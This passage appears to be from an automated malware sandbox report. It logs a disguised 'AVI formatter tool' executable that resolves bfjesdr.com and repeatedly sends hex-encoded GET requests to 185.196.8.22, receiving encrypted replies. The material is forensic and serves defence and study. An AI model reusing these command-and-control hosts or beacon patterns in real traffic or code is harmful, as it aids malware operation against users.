                                                                                                                                                        Jan 13, 2024 06:33:56.220316887 CET4982280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:56.220637083 CET8049823185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:56.220880985 CET4982380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:56.221788883 CET4982380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:56.407759905 CET8049823185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:56.443429947 CET8049823185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:56.443500042 CET4982380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:56.561737061 CET4982380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:56.562374115 CET4982480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:56.747785091 CET8049823185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:56.747863054 CET4982380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:56.748186111 CET8049824185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:56.748262882 CET4982480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:56.748717070 CET4982480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:56.934422970 CET8049824185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:56.964922905 CET8049824185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:56.965070009 CET4982480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:57.092747927 CET4982480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:57.093262911 CET4982580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:57.278981924 CET8049824185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:57.279062033 CET4982480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:57.279408932 CET8049825185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:57.279465914 CET4982580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:57.279830933 CET4982580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:57.465795040 CET8049825185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:57.502969027 CET8049825185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:57.503017902 CET4982580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:57.623537064 CET4982580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:57.624026060 CET4982680192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:57.809464931 CET8049825185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:57.809514046 CET4982580192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:57.809839010 CET8049826185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:57.809928894 CET4982680192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:57.810183048 CET4982680192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:57.995918036 CET8049826185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:58.026194096 CET8049826185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:58.026258945 CET4982680192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:58.139451981 CET4982680192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:58.140327930 CET4982780192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:58.327105999 CET8049826185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:58.327320099 CET4982680192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:58.327867985 CET8049827185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:58.328063011 CET4982780192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:58.328392029 CET4982780192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:58.514048100 CET8049827185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:58.550244093 CET8049827185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:58.550474882 CET4982780192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:58.670381069 CET4982780192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:58.670813084 CET4982880192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:58.856224060 CET8049827185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:58.856313944 CET4982780192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:58.856755972 CET8049828185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:58.856834888 CET4982880192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:58.857187033 CET4982880192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:59.043917894 CET8049828185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:59.074208021 CET8049828185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:59.074261904 CET4982880192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:59.200572968 CET4982880192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:59.201003075 CET4982980192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:59.386620998 CET8049828185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:59.386648893 CET8049829185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:59.386712074 CET4982880192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:59.386739969 CET4982980192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:59.387161970 CET4982980192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:59.573246956 CET8049829185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:59.609313011 CET8049829185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:59.609384060 CET4982980192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:59.731683016 CET4982980192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:59.732168913 CET4983080192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:59.917459011 CET8049829185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:59.917975903 CET8049830185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:33:59.918032885 CET4982980192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:59.918066978 CET4983080192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:33:59.918338060 CET4983080192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:34:00.104904890 CET8049830185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:34:00.140093088 CET8049830185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:34:00.140274048 CET4983080192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:34:00.261449099 CET4983080192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:34:00.261945009 CET4983180192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:34:00.447417021 CET8049830185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:34:00.447921038 CET8049831185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:34:00.447983980 CET4983080192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:34:00.448024988 CET4983180192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:34:00.448271990 CET4983180192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:34:00.634329081 CET8049831185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:34:00.664535999 CET8049831185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:34:00.668303967 CET4983180192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:34:00.792817116 CET4983180192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:34:00.793345928 CET4983280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:34:00.979012966 CET8049831185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:34:00.979033947 CET8049832185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:34:00.979090929 CET4983180192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:34:00.979135990 CET4983280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:34:00.979515076 CET4983280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:34:01.165193081 CET8049832185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:34:01.200164080 CET8049832185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:34:01.200252056 CET4983280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:34:01.326400042 CET4983280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:34:01.326916933 CET4983380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:34:01.512120962 CET8049832185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:34:01.512213945 CET4983280192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:34:01.512717962 CET8049833185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:34:01.512814045 CET4983380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:34:01.513159037 CET4983380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:34:01.699073076 CET8049833185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:34:01.729543924 CET8049833185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:34:01.729702950 CET4983380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:34:01.859256983 CET4983380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:34:01.859735966 CET4983480192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:34:02.045516014 CET8049833185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:34:02.045588017 CET4983380192.168.2.4185.196.8.22
                                                                                                                                                        Jan 13, 2024 06:34:02.046319008 CET8049834185.196.8.22192.168.2.4
                                                                                                                                                        Jan 13, 2024 06:34:02.046386003 CET4983480192.168.2.4185.196.8.22

                                                                                                                                                        UDP Packets

                                                                                                                                                        TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                        Jan 13, 2024 06:32:49.695250988 CET5534353192.168.2.4141.98.234.31
                                                                                                                                                        Jan 13, 2024 06:32:49.991533041 CET5355343141.98.234.31192.168.2.4

                                                                                                                                                        DNS Queries

                                                                                                                                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                        Jan 13, 2024 06:32:49.695250988 CET192.168.2.4141.98.234.310x78c6Standard query (0)bfjesdr.comA (IP address)IN (0x0001)false

                                                                                                                                                        DNS Answers

                                                                                                                                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                        Jan 13, 2024 06:32:49.991533041 CET141.98.234.31192.168.2.40x78c6No error (0)bfjesdr.com185.196.8.22A (IP address)IN (0x0001)false

                                                                                                                                                        HTTP Request Dependency Graph

                                                                                                                                                        • bfjesdr.com

                                                                                                                                                        HTTP Packets

                                                                                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                        0192.168.2.449735185.196.8.22807388C:\Users\user\AppData\Local\AVI formatter tool\aviformattertool.exe
                                                                                                                                                        TimestampBytes transferredDirectionData
                                                                                                                                                        Jan 13, 2024 06:32:50.253227949 CET318OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978f271ea771795af8e05c645db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608efa10c2ec9c9d3c HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:32:50.482608080 CET1286INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:32:50 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 66 36 34 0d 0a 36 37 62 36 38 61 38 61 33 32 30 33 61 37 37 62 30 34 31 38 66 35 35 66 36 37 37 32 38 64 63 34 35 39 66 65 38 37 64 32 65 33 31 66 30 31 65 61 61 62 35 31 66 63 35 32 39 31 62 64 64 33 38 32 64 37 63 30 31 34 63 34 31 34 64 65 65 35 63 38 36 35 37 32 65 33 31 34 39 31 38 64 38 34 31 34 32 35 66 37 37 36 35 30 61 35 36 62 66 37 36 32 61 30 32 64 35 37 63 33 66 64 64 39 30 64 63 30 34 33 63 36 37 62 62 35 30 65 66 65 33 33 38 33 33 38 65 63 31 30 62 38 36 33 63 36 35 39 62 65 65 33 34 65 65 36 35 62 37 36 34 36 66 32 32 35 36 32 39 31 32 35 36 34 38 37 65 31 31 36 63 34 65 35 39 34 39 66 33 62 63 64 36 34 39 31 31 31 63 36 35 32 38 62 32 63 61 38 35 38 62 32 65 39 34 31 32 30 65 34 37 66 64 38 66 65 37 39 62 39 38 34 65 39 64 30 35 34 65 37 33 65 63 31 30 38 33 34 35 64 35 32 33 65 65 32 32 32 37 32 30 32 36 37 62 39 65 63 38 36 66 38 38 33 33 33 35 30 65 36 35 34 36 35 32 30 66 37 32 64 34 33 66 36 66 35 65 65 38 36 66 39 33 65 37 62 61 66 65 61 34 30 38 63 38 36 66 66 37 63 33 39 31 32 62 64 36 64 66 31 39 39 63 65 62 38 36 36 64 31 36 62 30 65 32 39 33 30 36 63 62 32 35 31 63 36 63 33 61 66 33 64 32 36 61 34 63 31 30 62 62 32 30 36 62 39 61 32 33 32 62 33 63 34 63 61 33 38 36 61 32 63 30 37 63 64 33 31 65 62 31 32 66 30 64 30 62 36 30 36 34 35 64 34 33 66 31 33 63 34 35 65 64 61 66 32 36 62 38 33 32 62 62 66 38 38 35 63 61 36 65 61 63 65 61 39 63 30 33 39 32 39 62 38 37 38 62 64 65 64 30 31 39 61 61 31 62 34 36 64 35 64 61 31 39 39 66 36 32 31 61 39 65 30 38 32 38 31 31 35 65 62 31 34 65 32 35 61 38 62 34 64 36 35 63 36 61 62 63 39 66 61 63 36 34 38 36 36 61 31 38 37 65 61 33 38 61 35 37 35 38 39 30 66 33 63 61 61 32 61 64 31 32 36 64 66 39 61 30 33 64 35 35 65 62 37 32 66 30 36 31 65 35 38 63 30 64 36 36 65 35 63 33 30 35 36 36 33 39 62 66 66 38 37 33 34 32 39 36 33 35 31 31 38 63 65 63 38 62 30 31 35 31 33 66 64 64 64 62 31 65 63 63 33 33 36 37 65 37 63 66 39 33 62 38 33 64 63 30 34 30 62 34 33 39 37 61 39 63 34 30 33 34 37 34 64 64 31 36 33 37 37 35 63 32 64 34 66 65 30 64 37 63 63 63 64 66 35 63 63 35 39 39 64 33 63 36 63 34 65 66 35 37 34 33 64 39 63 32 61 62 35 64 31 39 32 37 65 38 39 34 61 63 34 38 34 32 61 31 66 30 62 36 31 39 36 66 31 39 39 66 34 31 63 30 63 62 38 32 64 38 39 64 30 30 63 37 32 30 62 64 37 33 36 63 63 66 34 39 61 30 39 37 65 33 30 36 66 39 66 33 35 30 62 66 33 35 65 34 34 36 30 36 36 38 65 34 62 64 30 62 62 61 33 65 37 33 66 61 32 64 39 63 37 30 65 35 30 38 39 32 35 64 36 34 33 35 30 38 63 61 63 64 36 36 36 64 31 35 62 33 38 62 37 36 38 65 39 32 63 32 65 62 36 37 61 38 38 35 33 30 33 63 61 61 35 62 61 61 66 36 62 61 64 63 31 30 63 39 32 34 35 64 32 64 63 64 35 34 61 61 63 31 35 61 39 34 61 66 37 62 33 62 31 36 63 39 33 61 34 32 66 61 61 32 66 33 65 30 61 33 32 64 39 38 31 37 39 30 32 65 62 61 33 64 35 34 34 37 35 65 32 32 62 33 38 32 61 31 66 31 39 64 63 32 62 62 34 34 36 61 64 31 65 38 63 34 33 64 63 61 30 64 36 39 32 34 61 66 30 34 62 38 61 38 30 62 30 63 62 32 33 30 61 63 63 32 65 32 66 62 61 38 31 35 36 63 34 34 66 30 35 30 32 34 65 64 38 34 33 31 30 35 66 33 31 34 32 30 37 66 61 39 65 34 61 35 66 61 38 30 38 33 61 64 34 66 34 61 63 31 35 63 65 65 62 37 33 62 61 65 38 65 37 65 61 31 65 32 31 37 34 63 30 30 34 63 34 64 33 31 34 61 33 35 63 66 34 34 38 32 33 37 32 62
                                                                                                                                                        Data Ascii: f6467b68a8a3203a77b0418f55f67728dc459fe87d2e31f01eaab51fc5291bdd382d7c014c414dee5c86572e314918d841425f77650a56bf762a02d57c3fdd90dc043c67bb50efe338338ec10b863c659bee34ee65b7646f2256291256487e116c4e5949f3bcd649111c6528b2ca858b2e94120e47fd8fe79b984e9d054e73ec108345d523ee222720267b9ec86f8833350e6546520f72d43f6f5ee86f93e7bafea408c86ff7c3912bd6df199ceb866d16b0e29306cb251c6c3af3d26a4c10bb206b9a232b3c4ca386a2c07cd31eb12f0d0b60645d43f13c45edaf26b832bbf885ca6eacea9c03929b878bded019aa1b46d5da199f621a9e0828115eb14e25a8b4d65c6abc9fac64866a187ea38a575890f3caa2ad126df9a03d55eb72f061e58c0d66e5c3056639bff873429635118cec8b01513fdddb1ecc3367e7cf93b83dc040b4397a9c403474dd163775c2d4fe0d7cccdf5cc599d3c6c4ef5743d9c2ab5d1927e894ac4842a1f0b6196f199f41c0cb82d89d00c720bd736ccf49a097e306f9f350bf35e4460668e4bd0bba3e73fa2d9c70e508925d643508cacd666d15b38b768e92c2eb67a885303caa5baaf6badc10c9245d2dcd54aac15a94af7b3b16c93a42faa2f3e0a32d9817902eba3d54475e22b382a1f19dc2bb446ad1e8c43dca0d6924af04b8a80b0cb230acc2e2fba8156c44f05024ed843105f314207fa9e4a5fa8083ad4f4ac15ceeb73bae8e7ea1e2174c004c4d314a35cf4482372b
                                                                                                                                                        Jan 13, 2024 06:32:50.482676029 CET1286INData Raw: 39 64 61 34 64 61 37 39 32 31 32 30 35 33 61 65 63 63 64 33 37 63 37 64 64 39 65 64 35 64 63 62 61 36 32 38 61 64 64 33 65 32 61 33 32 30 65 32 34 61 30 37 36 33 37 66 31 61 31 66 36 61 63 62 33 33 66 31 65 64 33 61 33 63 34 39 64 35 65 66 36 65
                                                                                                                                                        Data Ascii: 9da4da79212053aeccd37c7dd9ed5dcba628add3e2a320e24a07637f1a1f6acb33f1ed3a3c49d5ef6eebe4d3f14b5475af5be1f0eb69b4635ffa6d5dae4c6ada7c153ab8bc4ab5dcc71174ace7df7f825fff825adb8c312ec50639bd92fc33829977f4fa4f2c8bd3bf957da898dca0070816b75b70b0ede6fc4
                                                                                                                                                        Jan 13, 2024 06:32:50.482769966 CET1286INData Raw: 64 30 31 33 65 63 37 30 65 61 31 30 65 62 30 32 39 39 62 35 32 37 61 34 66 35 37 61 33 31 37 36 33 34 37 37 30 65 64 62 66 32 64 39 31 63 34 34 33 36 61 63 61 65 30 64 65 36 65 32 35 64 35 37 61 64 34 66 34 36 32 39 32 62 38 66 62 65 62 36 31 37
                                                                                                                                                        Data Ascii: d013ec70ea10eb0299b527a4f57a317634770edbf2d91c4436acae0de6e25d57ad4f46292b8fbeb617f7988cecf0ad0dfa488d4232f5fb311ba9b02ee68f35b60ecae61b50c5c17c63359467f10133aaebe1cc36c271276352224ce3a0c53b3eeb3670285dc00f990352259d7d86525a3e26493c9805c9756e5
                                                                                                                                                        Jan 13, 2024 06:32:50.482810020 CET285INData Raw: 34 38 38 37 30 38 35 61 38 39 34 33 63 63 36 65 37 63 65 36 66 32 64 62 35 35 35 34 35 34 38 38 32 37 36 37 36 31 62 39 35 62 64 36 61 64 66 62 39 64 64 66 34 30 62 30 39 34 64 32 38 64 65 36 30 64 66 31 65 65 65 34 32 63 30 34 66 64 38 32 32 39
                                                                                                                                                        Data Ascii: 4887085a8943cc6e7ce6f2db55545488276761b95bd6adfb9ddf40b094d28de60df1eee42c04fd8229c3b934c713ddd25efa2335dbb50cb0edc99ad34a092778d936b585ccfcdadc0ea10eca6c6647ca8b85c4a8dcdba60718e4d9c0a74609478bb6264ad6c0418fc85585744f8df5624545312510def2b84c7
                                                                                                                                                        Jan 13, 2024 06:32:50.482851982 CET414INData Raw: 31 39 32 0d 0a 32 61 36 36 36 63 33 37 37 35 30 33 62 64 64 63 66 37 34 35 34 37 37 30 32 31 65 64 62 38 35 62 32 64 66 32 35 30 30 64 30 30 65 35 31 35 37 39 35 33 66 33 30 36 66 64 66 32 37 38 37 66 39 66 66 64 32 34 39 31 33 37 38 34 32 64 30
                                                                                                                                                        Data Ascii: 1922a666c377503bddcf745477021edb85b2df2500d00e5157953f306fdf2787f9ffd249137842d06fa2ad2022d4718541b3d46b78b3e31765e94204b0145eeff8e3590d246a5ffa327548496f0a2171a7986c21eadd4b1e6d5ccab43601d61251cb114dec6f192aeb8b4f5e1fb1eeff60f03e63595796d85
                                                                                                                                                        Jan 13, 2024 06:32:53.119539976 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:32:53.401035070 CET220INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:32:53 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 65 0d 0a 36 37 62 36 38 30 38 31 33 30 30 38 63 32 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                        Data Ascii: e67b680813008c20
                                                                                                                                                        Jan 13, 2024 06:32:53.510107994 CET326OUTGET /search/?q=67e28dd86d55f128470aac1a7c27d78406abdd88be4b12eab517aa5c96bd86e992874f885a8bbc896c58e713bc90c91936b5281fc235a925ed3e51d6bd974a95129070b616e96cc92be510b866db52b2e34ae84c2b14a82966836f23d7f210c7ef909b39ce669111 HTTP/1.1
                                                                                                                                                        Host: bfjesdr.com
                                                                                                                                                        User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                        Jan 13, 2024 06:32:53.732130051 CET1286INHTTP/1.1 200 OK
                                                                                                                                                        Server: nginx/1.20.1
                                                                                                                                                        Date: Sat, 13 Jan 2024 05:32:53 GMT
                                                                                                                                                        Content-Type: text/html; charset=UTF-8
                                                                                                                                                        Transfer-Encoding: chunked
                                                                                                                                                        Connection: keep-alive
                                                                                                                                                        X-Powered-By: PHP/7.4.33
                                                                                                                                                        Data Raw: 66 36 34 0d 0a 36 37 62 36 39 63 39 35 33 38 30 34 62 32 36 62 35 36 35 66 65 39 35 62 33 32 31 62 64 31 39 61 35 35 66 62 39 30 63 64 65 33 31 37 30 31 65 61 61 36 35 64 66 34 30 31 64 37 66 61 38 31 65 38 39 34 38 37 34 36 38 36 34 39 63 64 65 34 64 65 33 64 32 39 61 66 34 63 65 30 64 31 63 37 31 33 32 35 65 39 37 37 35 33 61 63 37 63 66 33 37 39 61 38 33 36 35 31 64 65 66 64 64 61 31 36 63 37 34 37 63 37 37 63 62 35 31 30 66 66 33 38 38 64 32 31 66 61 31 32 61 32 36 30 64 62 35 32 62 61 65 33 35 30 65 63 35 33 37 62 34 39 65 66 32 34 36 37 39 65 33 64 36 32 39 30 66 65 31 31 63 38 66 31 39 34 39 61 33 33 64 33 36 65 39 31 31 36 64 32 35 31 38 66 32 61 62 64 35 66 62 36 66 37 35 65 32 31 65 35 36 35 64 33 66 34 37 65 61 37 38 65 65 36 64 63 34 30 65 35 33 65 63 39 31 64 33 32 35 61 34 34 32 32 65 37 32 33 36 63 30 39 36 36 62 63 66 32 38 63 66 62 38 63 32 65 35 31 65 36 35 37 37 61 32 30 66 36 33 34 35 62 66 66 65 32 65 35 38 38 66 32 32 30 37 33 61 31 65 37 34 31 39 32 38 34 66 62 37 31 32 36 31 32 62 35 37 36 65 39 39 31 64 35 62 33 36 35 64 30 37 35 30 34 32 30 33 30 36 65 61 61 35 37 63 65 64 64 61 36 33 38 32 66 62 32 64 37 30 38 62 30 31 65 62 62 61 36 33 61 61 36 63 34 63 62 33 32 37 65 32 63 30 65 64 33 33 30 65 30 31 32 65 66 64 39 61 30 30 30 34 65 63 63 33 64 31 33 63 30 34 62 64 63 66 34 36 39 39 62 32 64 62 37 39 36 35 35 61 33 65 62 64 39 62 36 63 38 33 63 33 64 62 63 37 39 62 64 66 33 30 65 39 39 61 61 62 64 37 33 35 61 61 62 38 36 66 63 32 34 62 33 66 63 38 30 38 35 30 31 65 65 31 36 66 63 35 38 38 32 34 35 36 36 63 65 62 35 63 31 66 36 64 63 34 63 37 39 61 32 39 30 66 30 33 66 61 63 36 61 38 31 30 65 33 64 61 61 32 37 64 34 33 38 64 36 39 36 30 35 64 35 35 66 62 34 33 36 31 61 31 38 35 37 64 34 64 36 36 65 35 66 33 31 35 31 36 35 38 35 66 37 38 37 32 66 33 32 36 32 34 39 30 65 63 65 63 31 62 37 30 65 31 32 66 38 64 30 62 32 65 38 64 64 33 34 37 66 37 30 65 66 33 36 39 62 63 30 30 36 31 35 34 31 39 63 61 39 64 61 30 37 34 34 34 65 64 37 37 64 37 35 35 31 33 35 34 39 66 64 64 35 64 31 64 32 66 32 63 39 35 62 38 32 33 64 36 34 34 34 66 66 37 63 33 34 38 39 32 39 62 65 63 61 38 64 37 64 38 61 35 64 64 65 38 65 32 32 30 32 30 61 36 39 39 61 66 64 39 64 65 61 31 38 30 34 61 37 32 37 38 66 63 36 31 30 37 37 30 62 63 33 33 36 63 61 66 35 38 66 30 39 37 35 33 36 37 62 39 65 33 35 30 32 65 36 35 64 34 65 37 62 37 39 38 65 34 62 63 34 62 64 61 32 66 39 33 35 61 37 64 62 63 33 31 30 35 32 38 36 32 39 63 61 35 63 35 37 38 63 62 37 63 39 36 63 64 30 34 66 33 61 62 65 36 30 65 38 32 63 32 36 62 33 36 66 38 36 35 31 30 33 63 64 61 35 62 61 61 63 36 64 62 39 63 39 30 62 39 38 34 62 64 36 64 65 63 30 34 61 61 65 31 35 61 39 34 32 66 64 61 63 61 65 36 37 39 61 61 65 33 30 61 62 32 65 33 63 30 36 33 34 63 37 38 33 37 33 31 34 65 64 62 66 63 38 34 35 36 63 65 39 32 36 33 64 33 34 31 36 31 38 64 65 32 34 61 66 34 37 61 35 31 34 39 62 34 35 63 33 61 32 63 65 38 64 34 39 66 62 34 39 39 37 38 36 62 37 63 61 32 65 30 65 64 32 32 36 32 65 61 31 39 65 35 63 63 30 35 35 31 39 30 37 34 63 63 63 34 37 31 35 35 39 33 30 34 38 30 33 65 34 39 37 34 64 34 38 61 39 31 34 33 30 63 65 66 31 62 35 31 65 63 63 65 38 36 64 62 30 65 39 65 36 66 65 31 64 32 30 37 30 64 35 30 33 63 36 63 61 30 62 61 34 35 39 65 30 34 61 33 64 37 30 62
